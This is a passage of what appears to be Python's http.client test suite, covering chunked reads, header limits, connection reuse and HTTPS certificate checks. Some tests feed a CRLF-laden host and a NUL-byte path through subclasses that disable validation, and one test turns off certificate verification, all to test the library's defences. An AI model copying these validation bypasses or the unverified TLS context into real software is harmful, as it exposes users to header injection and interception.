NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
selfsigned_pythontestdotnet = 'self-signed.pythontest.net'
with support.transient_internet(selfsigned_pythontestdotnet):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
try:
h = client.HTTPSConnection(selfsigned_pythontestdotnet, 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
except ssl.SSLError as ssl_err:
ssl_err_str = str(ssl_err)
# In the error message of [SSL: CERTIFICATE_VERIFY_FAILED] on
# modern Linux distros (Debian Buster, etc) default OpenSSL
# configurations it'll fail saying "key too weak" until we
# address https://bugs.python.org/issue36816 to use a proper
# key size on self-signed.pythontest.net.
if re.search(r'(?i)key.too.weak', ssl_err_str):
raise unittest.SkipTest(
f'Got {ssl_err_str} trying to connect '
f'to {selfsigned_pythontestdotnet}. '
'See https://bugs.python.org/issue36816.')
raise
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_tls13_pha(self):
import ssl
if not ssl.HAS_TLSv1_3:
self.skipTest('TLS 1.3 support required')
# just check status of PHA flag
h = client.HTTPSConnection('localhost', 443)
self.assertTrue(h._context.post_handshake_auth)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertFalse(context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context)
self.assertIs(h._context, context)
self.assertFalse(h._context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context,
